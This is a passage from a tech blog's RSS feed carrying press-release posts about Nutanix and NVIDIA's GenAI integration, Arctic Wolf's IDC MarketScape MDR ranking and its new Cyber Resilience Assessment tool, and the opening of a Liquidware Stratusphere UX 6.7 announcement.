<figure class="wp-block-image size-full"><img src="data:image/svg+xml,%3Csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20width='300'%20height='150'%20viewBox=%270%200%20300%20150%27%3E%3C/svg%3E" loading="lazy" data-lazy="1" decoding="async" width="300" height="150" data-tf-src="http://www.ervik.as/wp-content/uploads/2023/09/nutanix.png" alt="Nutanix and NVIDIA Collaborate to Accelerate Enterprise AI Adoption" class="tf_svg_lazy wp-image-18244"/><noscript><img decoding="async" width="300" height="150" data-tf-not-load src="http://www.ervik.as/wp-content/uploads/2023/09/nutanix.png" alt="Nutanix and NVIDIA Collaborate to Accelerate Enterprise AI Adoption" class="wp-image-18244"/></noscript></figure>



<figure class="wp-block-image size-large is-resized"><img src="data:image/svg+xml,%3Csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20width='1024'%20height='576'%20viewBox=%270%200%201024%20576%27%3E%3C/svg%3E" loading="lazy" data-lazy="1" decoding="async" width="1024" height="576" data-tf-src="http://www.ervik.as/wp-content/uploads/2022/01/01-nvidia-logo-vert-500x200-2c50-p@2x-1024x576.png" alt="Nutanix and NVIDIA Collaborate to Accelerate Enterprise AI Adoption" class="tf_svg_lazy wp-image-14977" style="width:304px;height:auto" data-tf-srcset="https://www.ervik.as/wp-content/uploads/2022/01/01-nvidia-logo-vert-500x200-2c50-p@2x-1024x576.png 1024w, https://www.ervik.as/wp-content/uploads/2022/01/01-nvidia-logo-vert-500x200-2c50-p@2x-300x169.png 300w, https://www.ervik.as/wp-content/uploads/2022/01/01-nvidia-logo-vert-500x200-2c50-p@2x-768x432.png 768w, https://www.ervik.as/wp-content/uploads/2022/01/01-nvidia-logo-vert-500x200-2c50-p@2x.png 1200w" data-tf-sizes="(max-width: 1024px) 100vw, 1024px" /><noscript><img decoding="async" width="1024" height="576" data-tf-not-load src="http://www.ervik.as/wp-content/uploads/2022/01/01-nvidia-logo-vert-500x200-2c50-p@2x-1024x576.png" alt="Nutanix and NVIDIA Collaborate to Accelerate Enterprise AI Adoption" class="wp-image-14977" style="width:304px;height:auto" srcset="https://www.ervik.as/wp-content/uploads/2022/01/01-nvidia-logo-vert-500x200-2c50-p@2x-1024x576.png 1024w, https://www.ervik.as/wp-content/uploads/2022/01/01-nvidia-logo-vert-500x200-2c50-p@2x-300x169.png 300w, https://www.ervik.as/wp-content/uploads/2022/01/01-nvidia-logo-vert-500x200-2c50-p@2x-768x432.png 768w, https://www.ervik.as/wp-content/uploads/2022/01/01-nvidia-logo-vert-500x200-2c50-p@2x.png 1200w" sizes="(max-width: 1024px) 100vw, 1024px" /></noscript></figure>



<p></p>



<p><em>Nutanix and NVIDIA Collaborate to Accelerate Enterprise AI Adoption</em></p>



<h2 class="wp-block-heading"><a href="https://www.nutanix.com/" target="_blank" rel="noopener">Nutanix</a> has announced a collaboration with NVIDIA aimed at helping enterprises more easily adopt generative AI (GenAI). Through the integration of <a href="https://www.nvidia.com/en-us/ai/" target="_blank" rel="noreferrer noopener">NVIDIA NIM</a> inference microservices with Nutanix GPT-in-a-Box 2.0, customers will be able to build scalable, secure, high-performance GenAI applications across the enterprise and at the edge.</h2>



<p>Today, most AI innovation is centered on the public cloud due to access to infrastructure and tooling able to support the needs of AI applications. Additionally, only the largest enterprises with teams of data scientists have made progress in GenAI adoption. However, most enterprises are looking to invest in supporting their AI strategy, including boosting their investment at the edge, according to the&nbsp;<a href="https://www.nutanix.com/ai-report" target="_blank" rel="noopener">State of Enterprise AL</a>. What’s missing is a fast-track for organizations to mainstream GenAI beyond the public cloud, across the enterprise, and at the edge.</p>



<p>Nutanix’s integration of&nbsp;<a href="https://www.nvidia.com/en-us/ai/" target="_blank" rel="noreferrer noopener">NVIDIA NIM</a>&nbsp;microservices will enable its customers to leverage Nutanix GPT-in-a-Box 2.0, built on top of the company’s rich data services and compute platform, and use it to simplify AI model deployment and more effectively and efficiently run enterprise AI/ML applications. This will expand access to the growing catalog of NVIDIA NIM microservices from across the enterprise and at the edge, helping to fast-track GenAI initiatives without requiring a team of data scientists.</p>



<p><a href="https://www.ervik.as/hybrid-multi-cloud/nutanix/">Nutanix’s</a> collaboration with NVIDIA helps simplify the experience, which many enterprises find challenging today, of making all the decisions required to stand up AI solutions. These include choosing among hundreds of thousands of models, serving engines, and supporting infrastructure, while lacking the new skill sets needed to deliver GenAI solutions to their customers.</p>



<p>Nutanix GPT-in-a-Box simplifies building an AI-ready stack, integrated with Nutanix Objects and Nutanix Files for model and data storage, enabling customers to maintain control over their data. New features delivered in GPT-in-a-Box 2.0 will also automate deploying and running inference endpoints for a wide range of AI models and secure access to the model using fine-grained access control and auditing.</p>



<p>Running on top of the Nutanix Cloud Platform, NIM microservices will enable seamless AI inferencing on a wide range of models, including open-source community models,&nbsp;<a href="https://www.nvidia.com/en-us/ai-data-science/foundation-models/" target="_blank" rel="noreferrer noopener">NVIDIA AI Foundation</a>&nbsp;models, and custom models, leveraging industry-standard application programming interfaces. To support the integration, Nutanix also announced certification for the&nbsp;<a href="https://www.nvidia.com/en-us/data-center/products/ai-enterprise/" target="_blank" rel="noreferrer noopener">NVIDIA AI Enterprise 5.0</a>&nbsp;software platform for streamlining the development and deployment of production-grade AI, including NVIDIA NIM.&nbsp;</p>



<p>“Enterprises are looking to simplify GenAI adoption, and Nutanix enables customers to move to production more easily while maintaining control, privacy, and cost,” said Tarkan Maner, Chief Commercial Officer at Nutanix. “This collaboration will add to this value by making it even easier for customers to leverage NVIDIA’s latest innovation with NIM.”</p>



<p>“Across every industry, enterprises are working to efficiently integrate AI into the cloud and data platforms that power their operations,” said Manuvir Das, Vice President of Enterprise Computing at NVIDIA. “The integration of NVIDIA NIM into Nutanix GPT-in-a-Box gives enterprises an AI-ready solution for rapidly deploying optimized models in production.”</p>



<p>Nutanix GPT-in-a-Box 2.0 is expected to be available in the second half of 2024. More information can be found&nbsp;<a href="http://nutanix.com/blog/gpt-in-a-box-2-is-here" target="_blank" rel="noopener">here</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Arctic Wolf Named a Leader in 2024 IDC MarketScape for Worldwide MDR &#8211; Managed Detection and Response Services</title>
		<link>https://www.ervik.as/arctic-wolf-named-a-leader-in-2024-idc-marketscape-for-worldwide-mdr-managed-detection-and-response-services/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Wed, 08 May 2024 06:27:19 +0000</pubDate>
				<category><![CDATA[Arctic Wolf]]></category>
		<category><![CDATA[SOC]]></category>
		<category><![CDATA[IDC]]></category>
		<category><![CDATA[IDC MarketScape]]></category>
		<category><![CDATA[Managed Detection and Response Services]]></category>
		<category><![CDATA[MDR]]></category>
		<category><![CDATA[soc]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=25628</guid>

					<description><![CDATA[Arctic Wolf®, a global leader in security operations, has announced it is positioned as a Leader in the IDC MarketScape: Worldwide Managed Detection and Response Services 2024 Vendor Assessment (Doc #US49006922). We believe the IDC MarketScape recognition validates how the company’s single, open platform delivers effective, comprehensive, and reliable security outcomes for customers around the globe. [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-named-a-leader-in-2024-idc-marketscape-for-worldwide-mdr-managed-detection-and-response-services%2F&amp;linkname=Arctic%20Wolf%20Named%20a%20Leader%20in%202024%20IDC%20MarketScape%20for%20Worldwide%20MDR%20%E2%80%93%20Managed%20Detection%20and%20Response%20Services" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-named-a-leader-in-2024-idc-marketscape-for-worldwide-mdr-managed-detection-and-response-services%2F&amp;linkname=Arctic%20Wolf%20Named%20a%20Leader%20in%202024%20IDC%20MarketScape%20for%20Worldwide%20MDR%20%E2%80%93%20Managed%20Detection%20and%20Response%20Services" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-named-a-leader-in-2024-idc-marketscape-for-worldwide-mdr-managed-detection-and-response-services%2F&amp;linkname=Arctic%20Wolf%20Named%20a%20Leader%20in%202024%20IDC%20MarketScape%20for%20Worldwide%20MDR%20%E2%80%93%20Managed%20Detection%20and%20Response%20Services" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-named-a-leader-in-2024-idc-marketscape-for-worldwide-mdr-managed-detection-and-response-services%2F&amp;linkname=Arctic%20Wolf%20Named%20a%20Leader%20in%202024%20IDC%20MarketScape%20for%20Worldwide%20MDR%20%E2%80%93%20Managed%20Detection%20and%20Response%20Services" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-named-a-leader-in-2024-idc-marketscape-for-worldwide-mdr-managed-detection-and-response-services%2F&amp;linkname=Arctic%20Wolf%20Named%20a%20Leader%20in%202024%20IDC%20MarketScape%20for%20Worldwide%20MDR%20%E2%80%93%20Managed%20Detection%20and%20Response%20Services" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-named-a-leader-in-2024-idc-marketscape-for-worldwide-mdr-managed-detection-and-response-services%2F&amp;linkname=Arctic%20Wolf%20Named%20a%20Leader%20in%202024%20IDC%20MarketScape%20for%20Worldwide%20MDR%20%E2%80%93%20Managed%20Detection%20and%20Response%20Services" title="Email" rel="nofollow noopener" target="_blank"></a></p>
<figure class="wp-block-image size-full"><img src="data:image/svg+xml,%3Csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20width='644'%20height='640'%20viewBox=%270%200%20644%20640%27%3E%3C/svg%3E" loading="lazy" data-lazy="1" style="background:linear-gradient(to right,#2c516c 25%,#0b3658 25% 50%,#123e61 50% 75%,#17476f 75%),linear-gradient(to right,#fefefe 25%,#ffffff 25% 50%,#ffffff 50% 75%,#072e4f 75%),linear-gradient(to right,#ffffff 25%,#ffffff 25% 50%,#888888 50% 75%,#072e4f 75%),linear-gradient(to right,#4b6274 25%,#4e6376 25% 50%,#4e606e 50% 75%,#5b3b3c 75%)" decoding="async" width="644" height="640" data-tf-src="https://www.ervik.as/wp-content/uploads/2024/05/arctic-wolf-leader-idc-mdr-2024.jpeg" alt="Arctic Wolf Named a Leader in 2024 IDC MarketScape for Worldwide Managed Detection and Response Services - MDR " class="tf_svg_lazy wp-image-25629" data-tf-srcset="https://www.ervik.as/wp-content/uploads/2024/05/arctic-wolf-leader-idc-mdr-2024.jpeg 644w, https://www.ervik.as/wp-content/uploads/2024/05/arctic-wolf-leader-idc-mdr-2024-300x298.jpeg 300w, https://www.ervik.as/wp-content/uploads/2024/05/arctic-wolf-leader-idc-mdr-2024-150x150.jpeg 150w" data-tf-sizes="(max-width: 644px) 100vw, 644px" /><noscript><img decoding="async" width="644" height="640" data-tf-not-load src="https://www.ervik.as/wp-content/uploads/2024/05/arctic-wolf-leader-idc-mdr-2024.jpeg" alt="Arctic Wolf Named a Leader in 2024 IDC MarketScape for Worldwide Managed Detection and Response Services - MDR
" class="wp-image-25629" srcset="https://www.ervik.as/wp-content/uploads/2024/05/arctic-wolf-leader-idc-mdr-2024.jpeg 644w, https://www.ervik.as/wp-content/uploads/2024/05/arctic-wolf-leader-idc-mdr-2024-300x298.jpeg 300w, https://www.ervik.as/wp-content/uploads/2024/05/arctic-wolf-leader-idc-mdr-2024-150x150.jpeg 150w" sizes="(max-width: 644px) 100vw, 644px" /></noscript></figure>



<h3 class="wp-block-heading">Arctic Wolf®, a global leader in security operations, has announced it is positioned as a Leader in the <a href="https://arcticwolf.com/resource/aw/idc-marketscape-worldwide-managed-detection-and-response-2024-vendor-assessment?lb-mode=overlay" target="_blank" rel="noopener">IDC MarketScape: Worldwide Managed Detection and Response Services 2024 Vendor Assessment (Doc #US49006922)</a>. We believe the IDC MarketScape recognition validates how the company’s single, open platform delivers effective, comprehensive, and reliable security outcomes for customers around the globe.</h3>



<p>Arctic Wolf Managed Detection and Response (MDR) provides exceptional visibility and threat protection to thousands of customers worldwide via the Arctic Wolf Platform, which ingests, parses, enriches, and analyzes more than five trillion security events per week. With its open-XDR architecture and a common data model built on the Open Cybersecurity Schema Framework (OCSF), the Arctic Wolf Platform leverages advanced AI-algorithms to deliver game-changing noise reduction that turns thousands of daily alerts into an average of a single actionable ticket for customers each day.</p>



<p>The assessment evaluated 19 Managed Detection and Response (MDR) vendors with a minimum of $60 million in annual revenue using a rigorous scoring methodology that examined product and service offerings, capabilities and strategies, and each vendor’s current and future market success factors.</p>



<p>According to the IDC MarketScape, “Taking a vendor and technology-neutral approach, Arctic Wolf’s customers have the flexibility to swap out tools and technologies (and therefore vendors), as well, preventing vendor lock-in without sacrificing their security efficacy.” Additionally, the IDC MarketScape highlights how “Arctic Wolf recognizes that their customers struggle with the evolving security demands of their organizations and the growth of their vulnerable attack surfaces” and that the company “designs a custom security journey for every customer to streamline the process of proactively mitigating risk and minimizing attack surface exposure.”</p>



<p>“We believe our position as a worldwide MDR Leader in the IDC MarketScape is a reflection of the power of the unified platform we’ve built, and our proven ability to deliver the security outcomes our customers desire.” said Dan Schiappa, chief product officer, Arctic Wolf. “In a threat landscape where threat actors are able to use AI to launch sophisticated attacks at an incredible scale, Arctic Wolf Managed Detection and Response is the ideal solution for organizations looking for holistic protection that defends at the speed of data.”</p>



<p>Being named a Leader in the IDC MarketScape for Worldwide Managed Detection and Response Services is the latest piece of market validation for Arctic Wolf’s security operations vision, and its leadership placement in this global assessment reflects the significant international investments the company has made in recent years, the most recent highlights of which include:</p>



<ul class="wp-block-list">
<li>Expanding the availability of its industry-innovating <a href="https://arcticwolf.com/resources/press-releases/arctic-wolf-expands-its-industry-leading-1-million-security-operations-warranty-to-europe-and-anz-region/" target="_blank" rel="noopener">$1 Million Security Operations Warranty</a> to customers in Europe and the ANZ region</li>



<li>Launching <a href="https://arcticwolf.com/resources/press-releases/arctic-wolf-advances-global-security-operations-portfolio-with-launch-of-incident-response-services-in-emea-and-anz-regions/" target="_blank" rel="noopener">Arctic Wolf Incident Response and the award-winning Arctic Wolf Incident Response JumpStart Retainer</a> in EMEA and ANZ</li>



<li>Scaling to <a href="https://arcticwolf.com/resources/press-releases/arctic-wolf-launches-data-center-in-australia-to-further-support-local-customers/" target="_blank" rel="noopener">five global security operations centers (SOCs) and six international data centers</a> to provide customers with optionality in how their data is stored and accessed</li>
</ul>



<p>In the last twelve months, Arctic Wolf has also been recognized as part of the&nbsp;<a href="https://arcticwolf.com/resources/press-releases/arctic-wolf-named-to-cnbc-disruptor-50-list-for-second-consecutive-year/" target="_blank" rel="noopener">CNBC Disruptor 50</a>, the&nbsp;<a href="https://arcticwolf.com/resources/press-releases/arctic-wolf-named-to-the-2023-forbes-cloud-100/" target="_blank" rel="noopener">Forbes Cloud 100</a>, the&nbsp;<a href="https://fortune.com/ranking/cyber/" target="_blank" rel="noopener">Fortune Cyber 60</a>, and received a&nbsp;<a href="https://arcticwolf.com/resources/press-releases/arctic-wolf-recognized-in-managed-detection-and-response-market-with-a-customers-choice-distinction-from-gartner-peer-insights/" target="_blank" rel="noopener">Customers’ Choice distinction in the Managed Detection</a>&nbsp;Response market from Gartner® Peer Insights.</p>



<p>To download an excerpt of the IDC MarketScape: Worldwide Managed Detection and Response Services 2024 Vendor Assessment,&nbsp;<a href="https://arcticwolf.com/resource/aw/idc-marketscape-worldwide-managed-detection-and-response-2024-vendor-assessment?lb-mode=overlay" target="_blank" rel="noopener">visit arcticwolf.com</a>.</p>



<p><strong>Additional Resources:</strong></p>



<ul class="wp-block-list">
<li>Join the conversation with Arctic Wolf on <a href="https://www.facebook.com/ArcticWolfNetworks" target="_blank" rel="noopener">Facebook</a>, <a href="https://twitter.com/AWNetworks" target="_blank" rel="noopener">Twitter</a>, <a href="https://www.linkedin.com/company/arcticwolf/" target="_blank" rel="noopener">LinkedIn</a>, and <a href="https://www.youtube.com/channel/UCen9S5KZnSYYDYO4DlyP7qA" target="_blank" rel="noopener">YouTube</a></li>



<li>Visit <a href="https://www.arcticwolf.com/" target="_blank" rel="noopener">arcticwolf.com</a> to learn more about our <a href="https://arcticwolf.com/solutions/" target="_blank" rel="noopener">security operations solutions</a></li>



<li>If you’re ready to get started, <a href="https://arcticwolf.com/request-demo/" target="_blank" rel="noopener">request a demo</a>, <a href="https://arcticwolf.com/request-quote/" target="_blank" rel="noopener">get a quote</a>, or <a href="https://arcticwolf.com/security-assessment/" target="_blank" rel="noopener">conduct a Security Operations Maturity Assessment</a></li>



<li>Want to join Arctic Wolf’s Partner Program? <a href="https://arcticwolf.com/partners/" target="_blank" rel="noopener">Apply today</a></li>
</ul>



<p><strong><br>About Arctic Wolf:</strong><br>Arctic Wolf® is a global leader in security operations, enabling customers to manage their cyber risk in the face of modern cyber-attacks via a premier cloud-native security operations platform. The Arctic Wolf Security Operations Cloud ingests and analyzes more than five trillion security events a week to help enable cyber defense at an unprecedented capacity and scale, empowering customers of virtually any size across a wide range of industries to feel confident in their security posture, readiness, and long-term resilience. By delivering automated threat protection, response, and remediation capabilities, Arctic Wolf delivers world-class security operations with the push of a button so customers can defend their greatest assets at the speed of data.</p>



<p><strong><br>About IDC MarketScape:</strong></p>



<p>IDC MarketScape vendor assessment model is designed to provide an overview of the competitive fitness of ICT (information and communications technology) suppliers in a given market. The research methodology utilizes a rigorous scoring methodology based on both qualitative and quantitative criteria that results in a single graphical illustration of each vendor’s position within a given market. IDC MarketScape provides a clear framework in which the product and service offerings, capabilities and strategies, and current and future market success factors of IT and telecommunications vendors can be meaningfully compared. The framework also provides technology buyers with a 360-degree assessment of the strengths and weaknesses of current and prospective vendors.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Arctic Wolf Cyber Resilience Assessment tool launched</title>
		<link>https://www.ervik.as/arctic-wolf-cyber-resilience-assessment-tool-launched/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Wed, 08 May 2024 06:15:36 +0000</pubDate>
				<category><![CDATA[Arctic Wolf]]></category>
		<category><![CDATA[CIS]]></category>
		<category><![CDATA[cyber insurance]]></category>
		<category><![CDATA[Cyber Resilience Assessment]]></category>
		<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[NIST]]></category>
		<category><![CDATA[NIST 2.0]]></category>
		<category><![CDATA[Tool]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=25622</guid>

					<description><![CDATA[Arctic Wolf, a global leader in security operations, has announced the release of the Arctic Wolf Cyber Resilience Assessment, an innovative risk assessment tool designed to help businesses of almost any size advance their cyber resilience and improve insurability by effectively mapping their security posture against industry-standard frameworks. The release of Arctic Wolf Cyber Resilience [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-cyber-resilience-assessment-tool-launched%2F&amp;linkname=Arctic%20Wolf%20Cyber%20Resilience%20Assessment%20tool%20launched" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-cyber-resilience-assessment-tool-launched%2F&amp;linkname=Arctic%20Wolf%20Cyber%20Resilience%20Assessment%20tool%20launched" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-cyber-resilience-assessment-tool-launched%2F&amp;linkname=Arctic%20Wolf%20Cyber%20Resilience%20Assessment%20tool%20launched" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-cyber-resilience-assessment-tool-launched%2F&amp;linkname=Arctic%20Wolf%20Cyber%20Resilience%20Assessment%20tool%20launched" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-cyber-resilience-assessment-tool-launched%2F&amp;linkname=Arctic%20Wolf%20Cyber%20Resilience%20Assessment%20tool%20launched" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-cyber-resilience-assessment-tool-launched%2F&amp;linkname=Arctic%20Wolf%20Cyber%20Resilience%20Assessment%20tool%20launched" title="Email" rel="nofollow noopener" target="_blank"></a></p>
<figure class="wp-block-image size-full"><img src="data:image/svg+xml,%3Csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20width='576'%20height='225'%20viewBox=%270%200%20576%20225%27%3E%3C/svg%3E" loading="lazy" data-lazy="1" decoding="async" width="576" height="225" data-tf-src="http://www.ervik.as/wp-content/uploads/2024/05/ArcticWolf-logo2.png" alt="Arctic Wolf Cyber Resilience Assessment" class="tf_svg_lazy wp-image-25623" data-tf-srcset="https://www.ervik.as/wp-content/uploads/2024/05/ArcticWolf-logo2.png 576w, https://www.ervik.as/wp-content/uploads/2024/05/ArcticWolf-logo2-300x117.png 300w" data-tf-sizes="(max-width: 576px) 100vw, 576px" /><noscript><img decoding="async" width="576" height="225" data-tf-not-load src="http://www.ervik.as/wp-content/uploads/2024/05/ArcticWolf-logo2.png" alt="Arctic Wolf Cyber Resilience Assessment" class="wp-image-25623" srcset="https://www.ervik.as/wp-content/uploads/2024/05/ArcticWolf-logo2.png 576w, https://www.ervik.as/wp-content/uploads/2024/05/ArcticWolf-logo2-300x117.png 300w" sizes="(max-width: 576px) 100vw, 576px" /></noscript></figure>



<h2 class="wp-block-heading">Arctic Wolf, a global leader in security operations, has announced the release of the Arctic Wolf Cyber Resilience Assessment, an innovative risk assessment tool designed to help businesses of almost any size advance their cyber resilience and improve insurability by effectively mapping their security posture against industry-standard frameworks. </h2>



<p>The release of Arctic Wolf Cyber Resilience Assessment expands Arctic Wolf’s Security Journey – a bespoke customer program that brings together tools and assessments to help customers better assess, mitigate, and transfer risk.</p>



<p>Organizations understand that cyber resilience is a critical factor in overall business resilience, specifically in obtaining cyber insurance. As the threat landscape continues to expand, nearly half of organizations need a risk assessment in order to qualify for cyber insurance, according to IDC<sup>1</sup>. Standardized risk measurement against standard cybersecurity frameworks, including those from the National Institute of Standards and Technology (NIST) and Center for Internet Security (CIS), is lacking industry-wide. As a result, cyber risk quantification is a critical challenge for leaders looking to provide an objective overview of cyber risk to cyber insurance carriers and other non-technical stakeholders.</p>



<p>In the recently published NIST Cybersecurity Framework 2.0, a new <a href="https://www.nist.gov/system/files/documents/2023/08/07/CSF%202.0%20Core%20with%20Examples%20Discussion%20Draft%5B74%5D.pdf" target="_blank" rel="noopener">GOVERN function</a> was added, underscoring the importance for organizations to establish and monitor their cybersecurity risk management strategy, expectations and policies. <a href="https://www.ervik.as/category/soc/arctic-wolf/">Arctic Wolf</a> Cyber Resilience Assessment helps organizations understand how ongoing governance activities rank relative to other cyber risks, track security posture over time and share assessment findings with non-technical stakeholders, including cyber insurance carriers through the Arctic Wolf Insurability Rating output. By mapping security posture to an agnostic industry standard with a transparent scoring system, organizations will be able to more effectively evaluate security hygiene and better understand how cyber risk impacts insurability with a transparent view of gaps and areas of improvement.</p>



<p>“Transferring certain business risks to a cyber insurance policy is a necessary piece of the fight to end cyber risk,” said Scott Holewinski, senior vice president, Security Journey, Arctic Wolf. “Whether companies are just starting down the path to obtain a cyber insurance policy, or are facing their annual insurance renewal, effectively assessing and communicating their security posture to the cyber insurance ecosystem is critical. With this announcement, Arctic Wolf continues to extend its position as a global cybersecurity leader delivering innovative new solutions that bring us closer to our insurance industry partners and open the possibility for exciting new risk transfer options for our customers.”</p>



<p>“In this challenging threat landscape, insurability has become a board-level concern for clients,” said Jacob Ingerslev, senior vice president, Underwriting, Cyber &amp; Tech, at Tokio Marine HCC – Cyber &amp; Professional Lines Group, a member of the Tokio Marine HCC group of companies based in Houston, Texas. “The market is flooded with proprietary risk assessment tools, many of which are tedious and require manual tracking, lack standardization and do not always map to established frameworks such as NIST. Being able to provide businesses with transparent security posture assessments will help technical leaders communicate areas of investment to board-level stakeholders and ultimately help businesses work towards becoming more insurable.”</p>



<p>“Cyber risk is business risk,” said Kristi Yauch, vice president, Information Security, Winnebago Industries Inc. “In order to withstand the pressures of today’s rapidly evolving threat landscape and increasing regulatory demands, it’s critical that organizations can directly map security posture to industry-standard frameworks and assure insurability; this assessment gives leaders the knowledge and insight to effectively navigate their security journey in the most impactful ways.”</p>



<p>Arctic Wolf Cyber Resilience Assessment is available to all Arctic Wolf customers, through the Unified Portal, building upon the company’s ongoing commitment to help organizations advance business resilience and insurability through an innovative approach to security operations.</p>



<h2 class="wp-block-heading">Key features of Cyber Resilience Assessment include:</h2>



<ul class="wp-block-list">
<li><strong>Industry Standard Framework Mapping: </strong>Options for customers to easily map security posture against their preferred industry-standard frameworks include NIST CSF 1.1, 2.0 and CIS Critical Security Controls v8, which present an agnostic, transparent rating system that is not reliant on proprietary risk assessment tools.</li>



<li><strong>Arctic Wolf Insurability Rating: </strong>Cyber Resilience Assessment includes an integrated cyber insurance rating to improve insurability. Customers can leverage this in insurance renewal cycles and in conversations with brokers to offer artifacts of support for self-attestations.</li>



<li><strong>Dynamic Risk Ranking and Prioritization: </strong>Aligned with the individual security items of each industry-standard framework, areas of risk are outlined and prioritized for mitigation, enabling more effective budget and resource allocation discussions for leaders.</li>
</ul>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Liquidware Announces Stratusphere UX 6.7, Delivering Enhanced DEX</title>
		<link>https://www.ervik.as/liquidware-announces-stratusphere-ux-6-7-delivering-enhanced-dex/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Fri, 19 Apr 2024 09:49:27 +0000</pubDate>
				<category><![CDATA[Liquidware]]></category>
		<category><![CDATA[DEX]]></category>
		<category><![CDATA[Stratusphere UX]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=24732</guid>

					<description><![CDATA[Liquidware, a leader in Digital Employee Experience ( DEX ) solutions for digital workspaces, today announced the release of Stratusphere™ UX 6.7. This latest version delivers a range of new features designed to improve the overall employee experience and empower IT professionals with deeper insights into workplace productivity. Redesigned UIStratusphere UX 6.7 boasts a redesigned [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Fliquidware-announces-stratusphere-ux-6-7-delivering-enhanced-dex%2F&amp;linkname=Liquidware%20Announces%20Stratusphere%20UX%206.7%2C%20Delivering%20Enhanced%20DEX" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Fliquidware-announces-stratusphere-ux-6-7-delivering-enhanced-dex%2F&amp;linkname=Liquidware%20Announces%20Stratusphere%20UX%206.7%2C%20Delivering%20Enhanced%20DEX" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Fliquidware-announces-stratusphere-ux-6-7-delivering-enhanced-dex%2F&amp;linkname=Liquidware%20Announces%20Stratusphere%20UX%206.7%2C%20Delivering%20Enhanced%20DEX" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Fliquidware-announces-stratusphere-ux-6-7-delivering-enhanced-dex%2F&amp;linkname=Liquidware%20Announces%20Stratusphere%20UX%206.7%2C%20Delivering%20Enhanced%20DEX" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Fliquidware-announces-stratusphere-ux-6-7-delivering-enhanced-dex%2F&amp;linkname=Liquidware%20Announces%20Stratusphere%20UX%206.7%2C%20Delivering%20Enhanced%20DEX" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Fliquidware-announces-stratusphere-ux-6-7-delivering-enhanced-dex%2F&amp;linkname=Liquidware%20Announces%20Stratusphere%20UX%206.7%2C%20Delivering%20Enhanced%20DEX" title="Email" rel="nofollow noopener" target="_blank"></a></p>
